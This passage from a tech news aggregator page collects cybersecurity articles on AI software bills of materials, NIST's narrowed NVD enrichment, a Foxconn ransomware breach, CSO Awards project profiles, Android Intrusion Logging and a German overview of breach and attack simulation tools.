Skip to content
View in the app

A better way to browse. Learn more.

hosang I.T.

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Tech

Tech Articles from a wide variety of topics and categories
The US Cybersecurity and Infrastructure Security Agency (CISA) and its G7 cyber agency partners have released a list of minimum elements for an AI software bill of materials, a move that could help CISOs assess the security and provenance of AI systems entering enterprise environments.
The guidance extends traditional SBOM concepts into AI by calling for documentation of models, datasets, software components, providers, licenses, and other dependencies. The supplemental minimum elements are not exhaustive or mandatory, CISA said, but reflect a consensus among G7 experts and are expected to expand as AI technology evolves.
For security leaders, the document puts AI risk more firmly inside enterprise supply-chain oversight. That could make AI SBOMs part of the same vendor-risk conversations that already surround software composition, cloud services, and third-party technology platforms.
But one important difference is that AI SBOMs require visibility beyond software composition, because AI risk is shaped by models, data, infrastructure, and system behavior.
“AI systems add new layers of opacity: model lineage, training and inference data, fine-tuning history, prompts, vector databases, third-party foundation models, APIs, orchestration logic, and runtime behavior,” said Sakshi Grover, senior research manager for IDC Asia Pacific Cybersecurity Services.
AI software is also different because it is probabilistic, with outputs shaped by data provenance as well as code, according to Keith Prabhu, founder and CEO of Confidis.
“AI software inherently encompasses more than just software,” Prabhu said. “In addition to the software components, it would also need to track models, training data, prompts and system instructions, model weights and checkpoints, and GPU dependencies.”
Sanchit Vir Gogia, chief analyst at Greyhound Research, put the shift more broadly.
“The question is no longer only, ‘what code is inside this product?’ The question is, ‘what code, model, data, infrastructure, control, and vendor decision shapes this system’s behavior?’” Gogia said.
How to make use of it
The immediate use of the guidance may be in procurement and vendor risk management. It gives security teams a way to press vendors before AI-enabled products are allowed into production.
“Organizations should ask vendors to provide visibility into model provenance, training data sources, software and API dependencies, licensing obligations, security testing practices, update cycles, runtime monitoring controls, and shared responsibility boundaries,” Grover said.
The level of scrutiny may also depend on the type of supplier.
“For large vendors, CISOs should specifically seek transparency around third-party foundation model dependencies, geographic data flows, model update practices, and whether customer data is being retained for model training or fine-tuning,” Grover added. “For startups, the focus should be on the maturity of governance processes, dependency tracking, secure development practices, identity controls, and operational monitoring across the AI life cycle.”
The same risk-based approach should apply to how the technology will be used. For higher-risk deployments, Gogia said AI SBOMs should become part of a broader vendor evidence pack, supported by documentation on data flows, security architecture, model behavior, privacy impact, red-team findings, incident response, logging, and prompt-injection testing.
The gaps that remain
The biggest gap is that an AI SBOM may show what a vendor says is inside an AI system, but does not prove whether the system can be trusted for the way an enterprise plans to use it.
“Minimum elements create visibility,” Gogia said. “They do not create assurance. They tell the buyer what the vendor says exists. They do not, by themselves, prove that every dependency has been disclosed, every dataset is lawful, every control works, every model behaves within tolerance, or every runtime pathway is being monitored.”
The hard part will be proving that the document matches reality. Security teams may receive an AI SBOM from a vendor, but they still need to determine whether it reflects the system running in production and keeps pace with changes to the AI environment. Prabhu said even a high-quality AI SBOM will offer only partial visibility into AI risk. Issues such as evolving AI behavior, hallucinations, changing prompt usage, and limited training data transparency can still make it difficult for security leaders to assess actual risk. As AI systems mature, AI SBOMs will also have to evolve to address those gaps, Prabhu added.
View the full article
On April 15, NIST announced a prioritized enrichment model for the National Vulnerability Database. Most CVEs will still be published, but fewer will receive the CVSS scores, CPE mappings, and CWE classifications that container scanners and compliance programs have historically relied on.
The change formalizes a drift that has been visible to anyone pulling NVD feeds for the past two years. What shifted on April 15 is the expectation: NIST has now said plainly that it does not intend to return to full-coverage enrichment. For programs that built scanning, prioritization, and SLA workflows around the assumption that NVD sits as the authoritative secondary layer on top of CVE, that assumption is worth a structured review.
What changed
Three categories of CVEs will continue to receive full enrichment:
CVEs in CISA’s Known Exploited Vulnerabilities catalog, targeted within one business day CVEs affecting software used within the federal government CVEs affecting “critical software” as defined by Executive Order 14028 Everything else moves to a new “Not Scheduled” status. Organizations can request enrichment by emailing [email protected], though no service-level timeline applies. NIST has also stopped duplicating CVSS scores when the submitting CNA provides one, and all unenriched CVEs published before March 1, 2026 have been moved into “Not Scheduled.”
The NIST volumes behind the decision
NIST cited a 263% increase in CVE submissions between 2020 and 2025, with Q1 2026 running roughly a third higher than the same period a year earlier. The rise tracks with a broader expansion in CVE numbering: more CNAs, more open source projects running their own disclosure processes, and more tooling surfacing issues that would not have reached CVE a few years ago.
Year
Published CVEs
Source
2023
~29,000
CVE.org
2024
~40,000
CVE.org
2025
~48,000
NIST
2026 (forecast)
~59,500 (median)
FIRST
AI is a compounding factor on both sides of this curve. In January, curl founder Daniel Stenberg shut down the project’s HackerOne bug bounty after six and a half years, citing “death by a thousand slops”: AI-generated reports that read like real research but described vulnerabilities that didn’t exist. Node.js, Django, and others have tightened intake under similar pressure. On the signal side, Anthropic’s April announcement of Claude Mythos Preview described a model that autonomously discovered thousands of zero-day vulnerabilities across every major operating system and web browser, including a 17-year-old unauthenticated RCE in FreeBSD’s NFS server. Earlier Anthropic research documented Claude Opus 4.6 finding and validating more than 500 high-severity vulnerabilities in production open source.
More noise and more real signal are heading toward the same pipeline. NIST enriched roughly 42,000 CVEs in 2025, its highest annual total, and still fell further behind incoming volume.
How it lands in compliance
The operational question is what programs have to document when NVD scoring is not available, and how consistently that documentation holds up across assessments.
Framework
NVD reference
Likely effect
FedRAMP
NVD CVSSv3 as original risk rating, with CVSSv2 and native scanner score as documented fallbacks
More variance in how remediation SLAs are applied across CSPs
PCI-DSS 4.0
Req. 11.3.2 external scans reference CVSS; ASV guidance points to NVD
More ambiguity on pass/fail determinations for unscored findings
NIST SP 800-53 (RA-5)
Lists NVD as an example source; permissive language
Lower direct impact, though auditors commonly expect CVSS-based severity evidence
DORA / SOC 2
No direct reference
Principles-based; audit expectations around severity rationale still apply
None of these frameworks break on their own. Mature vulnerability management programs generally have language in their SSPs and risk registers covering fallback scoring and exception handling. Programs that do not will likely need it before their next audit cycle.
The gap that is relevant to the container ecosystem
Two NVD inputs matter most for container scanning:
CPE applicability statements map a CVE to specific software packages. When CPE strings are missing, a scanner that matches primarily on CPE cannot determine which packages in an image are affected. The CVE exists in the database but is operationally invisible to the scan. CVSS scores drive prioritization and SLA routing. Without a score, a CVE may surface as UNKNOWN severity or fall outside remediation workflows entirely. Container images create a compounding effect here. Each image inherits packages from a base layer, application dependencies, and often a long transitive dependency chain. When any of those packages carries a CVE that NVD has not enriched, the gap propagates through every downstream image built on top of it. Scanners that draw on multiple advisory sources, and that match on package identifiers other than CPE, are less exposed.
Questions worth putting to image vendors
What advisory sources does your tooling use beyond NVD? When a CVE has no NVD CVSS score, what does the tool display, and does it trigger remediation workflows? How do you define “patched,” and is that definition in your written CVE policy? Are your remediation SLAs measured from CVE disclosure date or NVD enrichment date? Can a third-party scanner reproduce your clean-scan result against public advisory data? Where Docker sits
Docker Hardened Images are designed so that vulnerability management in container workloads does not depend primarily on NVD enrichment. Each image ships with signed attestations for build provenance, SBOMs in both CycloneDX and SPDX formats, OpenVEX exploitability statements, and scan results. SBOMs are generated from the SLSA Build Level 3 pipeline rather than inferred from external databases, so package inventory is accurate regardless of NVD’s enrichment state. Hardened System Packages allow package-level patching independent of upstream distribution timelines, which means remediation is not gated on a distribution maintainer’s release cadence or on an NVD analyst’s queue. When a CVE is not exploitable in a specific image context, that assessment is published as a signed VEX document that third-party scanners including Trivy, Grype, and Wiz consume natively.
Docker Scout, the scanning layer that reads these attestations, aggregates 22 advisory sources including NVD, CISA KEV, EPSS, GitHub Advisory Database, and 13 Linux distribution security trackers. Scout matches on Package URLs (PURLs) rather than NVD’s CPE scheme, which allows package identification to continue when CPE strings are unavailable. NVD remains a valuable input to this architecture, one of several rather than the spine.
What to reassess
Audit open findings against the March 1, 2026 cutoff. Any CVE published before that date that has not received NVD enrichment has already been moved to “Not Scheduled.” Programs carrying open findings tied to those CVEs may have severity scores and CPE mappings in their trackers that no longer reflect an active NVD record. Verify that the scoring basis for those findings is documented and defensible independent of NVD.
For programs running DHI, the NVD policy change does not require an operational response. For programs evaluating container security vendors more broadly, the question worth elevating in the next procurement cycle is whether NVD is one source of vulnerability intelligence in their stack, or the primary one.
The NVD will continue to play a role. That role is narrowing, and the signals suggest it will keep narrowing. Programs that use the April announcement as a prompt to audit their data sources now will have a cleaner answer the next time a regulator, an auditor, or a board asks where their vulnerability data actually comes from.
Sources and further reading
NIST, “NIST Updates NVD Operations to Address Record CVE Growth,” April 15, 2026 https://www.nist.gov/news-events/news/2026/04/nist-updates-nvd-operations-address-record-cve-growth FIRST, “2026 CVE Vulnerability Forecast” https://www.first.org/blog/20260211-vulnerability-forecast-2026 FedRAMP Vulnerability Scanning Requirements v3.0 https://www.fedramp.gov/docs/rev5/playbook/csp/continuous-monitoring/vulnerability-scanning/ Docker Scout advisory database sources https://docs.docker.com/scout/deep-dive/advisory-db-sources/ Docker Hardened Images documentation https://docs.docker.com/dhi/ “Why We Chose the Harder Path: Docker Hardened Images, One Year Later”https://www.docker.com/blog/why-we-chose-the-harder-path-docker-hardened-images-one-year-later/
View the full article
Apple supplier Foxconn has confirmed a cyberattack on several of its U.S. factories, after a ransomware group claimed to have stolen confidential Apple project files as part of the hack.


The Nitrogen group posted the breach on its data leak site this week, claiming to have made off with 8TB of data spanning more than 11 million files. Alongside the allegedly stolen Apple files, Nitrogen claims the trove includes internal project documentation and technical drawings tied to Intel, Google, Dell, and Nvidia.

Foxconn confirmed the intrusion to The Register on Tuesday, but the supplier did not respond to questions regarding whether any customer data was actually taken. A company spokesperson said its cybersecurity team activated response measures to keep production running, and that all of its affected factories are resuming normal operations.

Foxconn assembles a wide range of Apple products, but Apple famously takes the secrecy of unreleased products extremely seriously, and suppliers typically receive only the technical information needed for their specific role in manufacturing.

Nitrogen is believed to be an offshoot of leaked Russia-based Conti 2 ransomware code. If so, though, the stolen files may be inaccessible. Researchers at Coveware warned in February that a bug in the group's ESXi encryptor makes file recovery impossible, even for victims who pay up.

It's not the first time Foxconn has been targeted by ransomware gangs. The manufacturer was previously hit by LockBit in 2022 and 2024.Tag: Foxconn
This article, "Apple Project Files Allegedly Stolen in Foxconn Ransomware Attack" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
The annual CSO Awards annually recognize security projects that demonstrate outstanding security leadership and business value.
For this year’s program, CSO honors 64 security organizations whose hard work and innovative approaches have had a significant impact on how their enterprises navigate risks in an increasingly challenging cyber environment.
These projects showcase the variety of strategies that CISOs and their teams are employing to bolster enterprise security today. Many leverage the principles of zero trust to reduce risk. Others are using AI and automation to better defend their organization. Still others are using gamification and other change management practices to strengthen security awareness and bolster their first line of defense.
Here, we profile six of these award-winning initiatives that collectively represent the transformative work happening in security today.
Changing the security culture at Copart
Organization: Copart
Project: Making Cybersecurity as Instinctual as Buckling Your Seatbelt
Security leader: Kevin Vuong, CISO
With social engineering still a central initial attack vector today, online car auction company Copart faced a challenge familiar to most CISOs: training workers to automatically incorporate cybersecurity into their daily tasks.
Security process manager Brittany Little says the training and testing strategies that Copart’s security department had been using, such as phishing simulations, weren’t getting the results security leaders wanted to see. And traditional training, which was manual, episodic, and compliance-driven, didn’t match the education needs of a 12,000-member global workforce comprising vastly different role types.
So the security team set about creating a more efficient, impactful security awareness program, Little says, to make cybersecurity behavior as “instinctual as buckling a seatbelt.”
So Copart implemented an automated, adaptive security awareness program that continuously delivers role-based phishing simulations and immediate micro-training tied directly to employee actions. That ensures the training “focuses on the things that matter,” Little says.
The new program is also more intensive, Little says. Previously, security sent out three or four global simulations per quarter. “With a more efficient platform that has more automation and relatable content, we have delivered 202,992 simulations in one year — over 950 of those being unique simulations related to employee’s role, title, behavior analytics in the program,” she notes.
The revamped awareness program also leans into gamification, with live leaderboards, achievements, and recognition. And it replaced manual analysis with automated reporting and executive scorecards.
These improvements have increased the security culture at the company. In the two years before new program was introduced, the simulation reporting rates sat between 17% and 24%; with the new program, the report rate is between 55% and 60%.
“The gamification has been something that has made the training and awareness different,” Little says, noting that it has been key to worker engagement. Workers now boast about their strong performances and talk with one another as well as with security staffers about what they learned in the gamified training sessions.
The scorecards have also been instrumental, giving department leaders metrics on the cybersecurity acuity of each of their workers. “We look at the data, we analyze it, and now we get to go and actually have the conversations that matter,” Little explains. “It has allowed us to actually change behaviors.”
Zero trust data governance repositions HMSA’s cyber team as a business enabler
Organization: Hawaii Medical Service Association (HMSA)
Project: Zero Trust Data Governance Initiative
Security leader: Sudhakar Gummadi, CISO
HMSA CISO Sudhakar Gummadi says three forces prompted the nonprofit health insurer’s Zero Trust Data Governance Initiative: an intensifying threat landscape targeting the healthcare sector; increasing regulations and privacy expectations; and HMSA’s expanding digital footprint.
“We recognized that incremental remediation would not meaningfully reduce risk,” Gummadi says. “What was required was a deliberate transformation in how we think about trust, data usage, and accountability across the enterprise.”
HMSA embarked on its Zero Trust Data Governance Initiative in 2024 as part of that transformation.
In addition to implementing and maturing numerous zero-trust principles, HMSA sought to ensure no confidential member information (CMI) left its production zone.
That goal went against traditional healthcare industry practice, where copies of real-life production data existed for use in nonproduction environments to ensure system functionality and fidelity.
That practice, while operationally convenient, significantly increases enterprise exposure to data privacy and cybersecurity risks, Gummadi says, noting that many nonproduction systems don’t have the same security controls as in the production zone.
As such, the initiative’s biggest challenge was the change management component.
“We were asking teams to rethink long‑standing practices around how data is used in nonproduction environments,” Gummadi says. “We addressed this through sustained executive support, transparent communication, and a focus on early wins that demonstrated value — both to the business and to members whose trust we are responsible for protecting.”
In addition to eliminating CMI from all nonproduction environments, HMSA’s initiative sought to protect member data privacy and reduce exposure risk across the entire technology ecosystem; mitigate cybersecurity vulnerabilities associated with nonproduction environments; standardize and modernize data governance practices; and implement a scalable, sustainable, and automated masking framework.
To do that while ensuring operational continuity, HMSA’s security team opted to use high-fidelity, functionally equivalent data for development, testing, and analytics — a significant task, as HMSA had more than 50 terabytes of CMI residing across heterogeneous platforms, diverse data models, and inconsistent data governance processes.
HMSA used an AI-enabled automated data masking suite from Perforce Delphix to identify CMI and apply algorithmically consistent masking rules. That enabled HMSA to fully de-identify CMI in the nonproduction environment.
To ensure long-term sustainability, HMSA’s data governance team established standardized process flows, controls, and a responsibility assignment matrix, enabling automated masked data refreshes and ongoing compliance as systems evolve.
“Trust is foundational to HMSA’s mission. Protecting member information is not simply a compliance requirement; it is a core business imperative,” Gummadi adds. “This initiative strengthened our ability to safeguard that trust at scale, while also improving operational efficiency and enabling more informed decision‑making. It repositioned cybersecurity as a strategic enabler rather than a downstream control.”
Hensel Phelps takes a team approach to automating away cyber drudgework
Organization: Hensel Phelps Construction
Project: Project SAM
Security leader: Dustin Morris, director of cybersecurity and compliance
Dustin Morris, director of cybersecurity and compliance of Hensel Phelps, faces a scenario common for security leaders: defending against an ever-expanding threat environment with resources that don’t grow as much or as fast.
Starting in 2024, Morris focused on using automation to build capacity, setting out to automate 1,250 hours of manual tasks, effectively replicating a full-time employee’s functions.
“The vision was to really reduce the day-to-day monotonous tasks we have in cybersecurity operations,” says Morris, who took a methodical and enlisted his five-person team.
Together they identified tasks to automate, calculated how much time that automation would save them, and laid the groundwork for automation.
Morris then scheduled an “automation week,” during which the entire team came together to automate those identified tasks. In some cases, they implemented automation capabilities offered within their existing security software, while in other cases they built their own.
Automation work has been ongoing, including a second “automation week” in 2025 — at which point the project was dubbed SAM for “Security Automation Member.”
By early 2026 the security team’s automation efforts eliminated more than 1,250 hours per year of manual effort while improving consistency, reducing human error, and strengthening the company’s security posture. Furthermore, the automation enhanced operational efficiency, optimized license utilization, and improved user experience by reducing downtime and accelerating remediation.
Additionally, the initiative demonstrated how automation can scale security operations to meet business growth without proportional increases in headcount while increasing work-life balance for cyber employees. Project SAM has also enabled security team members to spend more time on high-value proactive security tasks, such as threat hunting.
Morris aims to automate another FTE’s worth of work by the end of 2027.
K&N Engineering shifts left for greater cloud security
Organization: K&N Engineering
Project: Code to Cloud Security Transformation
Security leader: Iqbal Rana, CIO
Manufacturing company K&N Engineering manages its own direct-to-consumer ecommerce environment in AWS. CIO Iqbal Rana, who oversees security, has always followed security best practices in the cloud, relying on cloud-native security capabilities and controls implemented by his security team to ensure “we had all the rights things in place.”
But an assessment by his cyber insurance company a couple of years ago alerted him to a security vulnerability in the software deployment tool used by his IT workers.
That alert prompted Rana to immediately address the vulnerability — and to more aggressively look at the risks within his vendor environment and in IT processes, he says.
That led to K&N’s Code to Cloud Security Transformation, which tackles vulnerabilities not only in vendor tools but also in the code his team was deploying.
The initiative involved implementing a code-to-cloud security framework and Wiz technology, which integrated security into every stage of the development lifecycle across K&N’s AWS and Azure environments.
Now his team can proactively identify and remediate vulnerabilities before deployment, ensuring secure, compliant, and efficient cloud operations.
“So we not only fix the deployment risk but also code risk as well,” he says, explaining that the technology prevents code with known vulnerabilities from being inadvertently deployed. “And it doesn’t end there. When the code is deployed [and] you’re live in production, at that point it keeps checking on an ongoing basis. So we have a dashboard that will tell us not only any infrastructure vulnerability but also any problem with the code.”
Rana says the technology enabled a transformative shift-left strategy, as his team can now uncover and remediate hundreds of hidden vulnerabilities. It also gave the team near real-time visibility into risk exposure while strengthening compliance and safeguarding critical revenue streams.
Security transformation fortifies McDonald’s resilience while reducing risk
Organization: McDonald’s
Project: Securing the Arches
Security leader: Mike Gordon, CISO
McDonald’s has more than 44,000 locations operating in more than 100 countries, serving 69 million-plus customers daily. Approximately 95% of its restaurants are operated by local franchisees.
The company’s technology stack reflects its size, global reach, and distributed nature. Its cyber risk does, too. For example, its mobile app connects some 250 million consumers to its restaurants.
“Digital transformation created a much more connected ecosystem at McDonald’s than was ever imagined by Ray Kroc,” says company CISO Mike Gordon. “As such, cyber risk was way higher than it ever was.”
An assessment of the company’s security posture performed a few years ago confirmed as much, showing tech leadership there was room for improvement. The assessment determined that the company’s maturity on the NIST Cybersecurity Framework trailed industry peers. It also showed that its cybersecurity capabilities, including foundational controls and visibility into threats and vulnerabilities, varied widely across regions.
As a result, McDonald’s CIO championed a transformation and hired Gordon in early 2024 to execute it.
The Securing the Arches (STA) program modernized and unified cybersecurity across both the company’s corporate and licensed markets. STA established a consistent foundation for identity controls, vulnerability management, data protection, and threat detection across the company’s 100-plus markets. It also established consistent, enterprise-grade protections through shared services that include a global SOC, secure development pipelines, proactive testing, and systemwide endpoint visibility.
The size and structure of this transformation required strong executive skills.
“I’m not a CISO of one company; I’m fundamentally the CISO of about 150 companies, of which I actually only have direct control over one,” Gordon explains, saying transformation success meant building relationships and influencing other leaders as well as deploying the right technology and technical skills within the security team.
STA has strengthened the company’s resilience and reduced risk, thereby providing the security foundation needed to support McDonald’s accelerating digital growth. As the company’s cybersecurity maturity has climbed, Gordon says he’s now enacting Securing the Arches 2.0 with a focus on continually improving the effectiveness of the cybersecurity program. “We’ll continue to evolve,” he adds.
MISO brings maturity and metrics to threat action operations
Organization: Midcontinent Independent System Operator (MISO)
Project: STRIKE (Strategic Threat Reduction & Intelligence-Driven Knowledge Engine)
Security leader: Eric Miller, VP and CISO
Like many security departments, MISO’s security team used common tools such as NIST frameworks and other maturity models to score its program and track its maturity improvements.
“But from a threat intelligence and a threat hunting perspective, there wasn’t really a particular meaningful metric to indicate how successful our program was,” says David Webb, director of MISO’s cyber threat action center.
As a result, MISO security leaders and other executives weren’t able to clearly track the center’s effectiveness or whether it was maturing. So in 2024 Webb and threat researcher Nate Apperson started the Strategic Threat Reduction & Intelligence-Driven Knowledge Engine, or STRIKE.
STRIKE transforms cybersecurity risk management by integrating global threat intelligence, MITRE ATT&CK mapping, and NIST frameworks into a unified model. It delivers real-time scoring that quantifies visibility gaps and control effectiveness against real-world adversary tactics. It also prioritizes actions based on threat likelihood and readiness. And it provides a prescriptive path for technical configuration, thereby reducing remediation and analysis cycles to near-instant.
According to Webb, STRIKE ensures security activities align with threat intel and contribute to advancing the overall cyber security strategy. It also provides metrics for measuring the effectiveness of threat hunting — a vital benefit.
“When we do a threat hunt or when we complete one, what’s the output? We wanted more than just a check mark on the top of the page saying that we’ve completed the threat hunt,” Webb explains. “We want to show that we are reducing risk throughout the organization.”
It’s a common challenge, he says, as traditional risk management relies on siloed frameworks and subjective prioritization. This leaves gaps between threat intelligence, control requirements, and technical remediation.
To overcome that challenge, STRIKE operationalizes threat intelligence to identify active adversary behaviors and align them to MITRE ATT&CK techniques, thereby ensuring risk decisions are based on real-world threats. STRIKE also creates links between ATT&CK techniques, NIST CSF functions, and NIST SP 800-53 controls, thus clarifying which controls mitigate which adversary behaviors and highlighting gaps across policy, process, and technology. Additionally, Webb says that by incorporating DISA STIGs, STRIKE provides the technical steps to close control gaps.
Tying it all together is STRIKE’s Detect & Protect Scoring Framework, a quantitative model that measures visibility (detect) and defensive strength (protect) against high-risk techniques with scores weighted by threat likelihood and updated dynamically.
View the full article
Cybersecurity researchers are calling attention to a new campaign dubbed GemStuffer that has targeted the RubyGems repository with more than 150 gems that use the registry as a data exfiltration channel rather than for malware distribution. "The packages do not appear designed for mass developer compromise," Socket said. "Many have little or no download activity, and the payloads are repetitive,View the full article
Gorodenkoff / Shutterstock
Die Google Threat Intelligence Group (GTIG) warnt davor, dass kriminelle Hacker mittlerweile KI einsetzen – sowohl, um Schwachstellen aufzuspüren, als auch um anschließend Malware zu entwickeln, die diese aktiv ausnutzt. Der Anlass: Im Rahmen der eingehenden Analyse einer Angriffskampagne prorussischer Hacker haben die Sicherheitsexperten nach eigenen Angaben erstmals einen KI-basierten Zero-Day-Exploit „in freier Wildbahn“ entdeckt.
System-Management-Tool ausgehebelt
„Unsere Analyse der mit dieser Kampagne verbundenen Schwachstellen identifizierte eine Zero-Day-Schwachstelle. Diese ist in einem Python-Skript implementiert und ermöglicht es, die Zwei-Faktor-Authentifizierung eines populären, webbasierten System-Management-Tools auf Open-Source-Basis zu umgehen“, so die Google-Sicherheitsexperten in einem (ausführlichen) Blogbeitrag.
Um welches Tool es sich dabei konkret handelt, ist derzeit nicht bekannt. Die betroffenen Parteien wurden jedoch über die Entdeckung informiert. (fm)
Dieser Artikel ist im Original bei unserer Schwesterpublikation Computersweden.se erschienen.
View the full article
Google on Tuesday unveiled a new opt-in Android feature called Intrusion Logging for storing forensic logs to better analyze sophisticated spyware attacks. Intrusion Logging, available as part of Advanced Protection Mode, enables "persistent and privacy-preserving forensics logging to allow for investigation of devices in the event of a suspected compromise," the company said. The feature, itView the full article
Roman Samborskyi | shutterstock.com
Lösungen im Bereich Breach & Attack Simulation (BAS) unterstützen Unternehmen dabei, ihr Sicherheitsniveau zu verstehen. Dazu automatisieren die Tools die Tests spezifischer Bedrohungsvektoren. Als Grundlage dienen dabei in der Regel das MITRE-ATT&CK– oder Cyber-Killchain-Framework. BAS-Produkte simulieren zum Beispiel:
Netzwerkangriffe und Infiltrationsversuche,
Lateral Movement,
Phishing,
Endpunkt- und Gateway-Attacken,
Malware- und Ransomware-Angriffe sowie
Insider-Bedrohungen.
Breach & Attack Simulation eingeordnet
Breach & Attack Simulation kann Red Teaming, Penetration Testing oder auch Attack Surface Assessments (ASA) ergänzen, unterscheidet sich aber deutlich von diesen Maßnahmen. Stellen Sie sich vor, Ihr Unternehmen wäre eine Villa:
Beim Red Teaming oder Penetration Testing beauftragen Sie jemanden, in Ihr Anwesen einzubrechen und Ihren Safe auszuräumen. Das Ziel: potenzielle Zugangsmöglichkeiten aufzudecken.
Breach & Attack Simulation ist hingegen, als würden Sie sämtliche Schlösser an den Türen auf Funktionstüchtigkeit prüfen und sicherstellen, dass die installierten Security-Kameras auch entsprechend reagieren, wenn sie Personen erkennen. Das Ziel: sichergehen, dass alle Kontrollmaßnahmen wie vorgesehen funktionieren.
Während sich BAS dabei auf Enterprise-Security-Kontrollen wie EDR fokussiert, werden beim Attack Surface Assessment sämtliche potenziellen Schwachstellen und Angriffsvektoren untersucht.
Das Analystenhaus Gartner fasst diese Technologien in der breiteren Kategorie “Exposure Management” zusammen. Laut den Analysten sind Lösungen im Bereich Breach & Attack Simulation vor allem in stark regulierten Branchen wie dem Banken- und Versicherungsumfeld gefragt, die mit wachsenden Compliance-Anforderungen konfrontiert sind. Diese Einschätzung kann Ilja Rabinovich, Director of Adversarial Tactics beim Sicherheitsanbieter Sygnia, nur bestätigen: “BAS-Produkte sind in der Regel teuer und werden von kleineren Unternehmen mit begrenztem Budget oder eingeschränkter Prozesslandschaft nicht angeschafft.”
Der Markt für Breach & Attack Simulation Tools
Die Auguren von Gartner prognostizieren, dass sich mehr als 40 Prozent aller Unternehmen bis zum Jahr 2026 auf konsolidierte Plattformen oder Managed Service Provider verlassen werden, wenn es um Validierungsprüfungen im Bereich Cybersecurity geht. Entsprechend breit aufgestellt präsentiert sich die BAS-Anbieterlandschaft: Sowohl Standalone-Anbieter als auch große Security-Unternehmen und Service Provider wollen ihre BAS-Lösungen an den Kunden bringen. Chirag Mehta, Analyst bei Constellation Research, sieht dabei eine weitergehende Konsolidierung des Marktes am Horizont: “Wenn Sie ein Tool haben, das Angriffe simulieren kann, ist der nächste logische Schritt, diese Attacken zu verhindern. Das erfordert allerdings, eine Reihe verschiedener Tools zu integrieren, was kein Kinderspiel ist.”
Ein wachsender Trend in diesem – wie auch allen anderen Bereichen der IT-Sicherheit – ist der Einsatz von Generative AI (GenAI). Erik Nost, Analyst bei Forrester Research, sieht diese Entwicklung positiv: “Vermutlich werden wir generative KI als erstes im Bereich des User Interface im Einsatz sehen. Mit Daten auf coole Art und Weise interagieren zu können, ist der neue GenAI-Use-Case.”
Der Analyst hält es auch für möglich, dass KI künftig auf der Basis von Daten – oder den für die Benutzer respektive das Unternehmen relevantesten Angriffsarten – Bedrohungen modelliert. Er fügt hinzu: “Generative KI könnte außerdem auch eingesetzt werden, um Unternehmen dabei zu helfen, die von BAS gefundenen Probleme zu verstehen, entsprechende Prioritäten zu setzen und spezifische Abhilfemaßnahmen vorzuschlagen.”
Das sollten BAS-Lösungen leisten
Auf folgende wichtige Features sollten Anwender bei Breach & Attack Simulation Tools achten:
Repräsentative Angriffsvektoren, um ein möglichst breites Spektrum an für das Unternehmen relevanten Angriffen simulieren zu können.
Realistische Angriffsszenarien auf Grundlage von Frameworks wie MITRE ATT&CK, die denen echter Angreifer ähneln.
Anpassbare Szenarien, um spezielle Infrastrukturaspekte testen zu können.
Automatisierte Tests, um regelmäßige und effiziente Simulationen zu realisieren, ohne den Betrieb zu beeinträchtigen oder zusätzliche personelle Ressourcen einzusetzen.
Detaillierte Reportings und Analysen, um die Bedeutung der Tests erklären und verbesserungswürdige Bereiche identifizieren zu können.
Skalierbarkeit, um nicht nur die aktuelle Unternehmensumgebung, sondern auch künftige Entwicklungen abdecken zu können.
Testmöglichkeiten für hybride Produktionsumgebungen, um Kontrollmaßnahmen unter realen Bedingungen begutachten zu können.
Einfache Nutzung und simple Deployment-Optionen, sowie Integrationsmöglichkeiten mit vorhandenen Security-Tools und -Plattformen.
Fachkundiger Support – insbesondere, wenn Sie mit Breach & Attack Simulation Tools nicht vertraut sind oder keine größeren Sicherheitsteams mit entsprechenden Erfahrungswerten einsetzen können.
Eine geeignete Kostenstruktur, da die Preismodelle von BAS-Anbietern in der Regel variieren. Die Preisstruktur sollte dem Anwendungsfall angemessen sein.
Die wichtigsten Anbieter für Breach & Attack Simulation Tools
Im Folgenden werfen wir einen Blick auf die wichtigsten Anbieter – und ihre Lösungen – im Bereich Breach & Attack Simulation. Die Auswahl basiert dabei auf Kundenrezensionen aus Gartners Peer-Insights-Ranking sowie den Einschätzungen der Spezialisten von Expert Insights.
AttackIQ
Laut Expert Insights repliziert die zentrale Emulationsplattform von AttackIQ die Taktiken, Techniken und Methoden von Angreifern im Einklang mit dem MITRE-ATT&CK-Framework. Das Angebot des Unternehmens im Bereich Breach & Attack Simulation gliedert sich in drei Optionen:
Die Managed Platform “Ready!” soll Unternehmen schneller und einfacher zu einer konsistenten Security-Validation-Strategie verhelfen.
Der agentenlose Testing Service “Flex” funktioniert On Demand und wird im Pay-as-you-Go-Modell oder auch auf monatlicher sowie jährlicher Basis abgerechnet.
Bei “Enterprise” handelt es sich um einen umfassenden Co-Managed-Service.
AttackIQ hat sich zudem einen Namen gemacht, wenn es darum geht, ML- und KI-basierte Cybersecurity-Komponenten zu testen. Nach eigener Aussage ist das Unternehmen zudem der einzige BAS-Anbieter, der sowohl Self-Service- als auch Full-Service-Lösungen anbietet. Künftig soll künstliche Intelligenz Attack-IQ-Kunden außerdem verstärkt dabei unterstützen, Sicherheitslücken automatisiert zu identifizieren und zu beheben.
Cymulate
Cymulate gehört nicht nur laut Expert Insights zu den führenden Anbietern für Continuous Threat Exposure Management, sondern ist auch der Anbieter mit den besten Kundenbewertungen bei Gartners Peer Insights – auch dank der guten User Experience. Die “Breach and Attack (BAS)”-Lösung von Cymulate wird im SaaS-Modell bereitgestellt. Für Unternehmen mit Data-Segregation-Bedürfnissen steht auch eine Private-Tenancy-Option zur Verfügung. Wie AttackIQ verwendet Cymulate das MITRE ATT&CK Framework als Grundlage.
Laut dem Anbieter dauert es derzeit circa drei bis vier Wochen, um die Integrationen einzurichten und sein BAS-Tool einzusetzen. Diesen Zeitraum möchte Cymulate künftig mit Hilfe von Generative AI auf wenige Minuten reduzieren. Doch die GenAI-Pläne des Anbieters gehen noch weiter: Die Technologie soll künftig automatisiert aus Tausenden oder gar Hunderttausenden verschiedenen Angriffsszenarien Mitigationsstrategien entwickeln können – und den Security-Teams erklären, wie diese umzusetzen sind. Die GenAI-Funktionen sollen laut Cymulate bis Ende Oktober 2024 in vollem Umfang zur Verfügung stehen.
Fortinet
